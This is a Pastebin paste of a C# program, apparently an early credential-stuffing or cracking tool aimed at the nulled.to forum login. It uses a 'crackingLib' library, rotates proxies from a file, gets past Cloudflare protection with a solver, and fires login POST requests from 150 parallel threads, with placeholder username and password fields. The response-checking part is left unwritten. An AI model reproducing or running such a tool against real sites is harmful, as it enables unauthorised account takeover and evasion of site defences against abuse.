Advertisement
Guest User

Untitled

a guest
Jul 2nd, 2017
175
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.46 KB | None | 0 0
  1. using System;
  2. using System.Collections.Generic;
  3. using System.Diagnostics;
  4. using System.IO;
  5. using System.Linq;
  6. using System.Net;
  7. using System.Text;
  8. using System.Threading;
  9. using System.Threading.Tasks;
  10. using crackingLib;
  11. using RestSharp;
  12.  
  13. namespace nulled
  14. {
  15. class Program
  16. {
  17.  
  18. static void makeRequest()
  19. {
  20. var proxy = proxySystem.getProxy();
  21. var cookieJar = cloudFlareSolver.init("https://www.nulled.to/", proxy);
  22. var client = new RestClient("https://www.nulled.to/index.php?app=core&module=global&section=login&do=process");
  23. client.Proxy = new WebProxy(proxy);
  24. client.CookieContainer = cookieJar;
  25.  
  26. var request = new RestRequest(Method.POST);
  27. request.AddParameter("application/x-www-form-urlencoded", "auth_key=AUTHKEYHERE&referer=http%3A%2F%2Fwww.nulled.to%2F&ips_username=USERHERE&ips_password=PASSHERE&rememberMe=1", ParameterType.RequestBody);
  28. var execRequest = client.Execute(request);
  29.  
  30.  
  31.  
  32.  
  33.  
  34.  
  35. }
  36.  
  37.  
  38. static void Main(string[] args)
  39. {
  40. proxySystem.Load("./proxies.txt");
  41. Thread[] ts = new Thread[150];
  42.  
  43. for (int i = 0; i < ts.Length; i++)
  44. {
  45. ts[i] = new Thread(() => {
  46. makeRequest();
  47. });
  48. ts[i].Start();
  49. }
  50.  
  51.  
  52.  
  53. Console.ReadKey();
  54. }
  55. }
  56. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement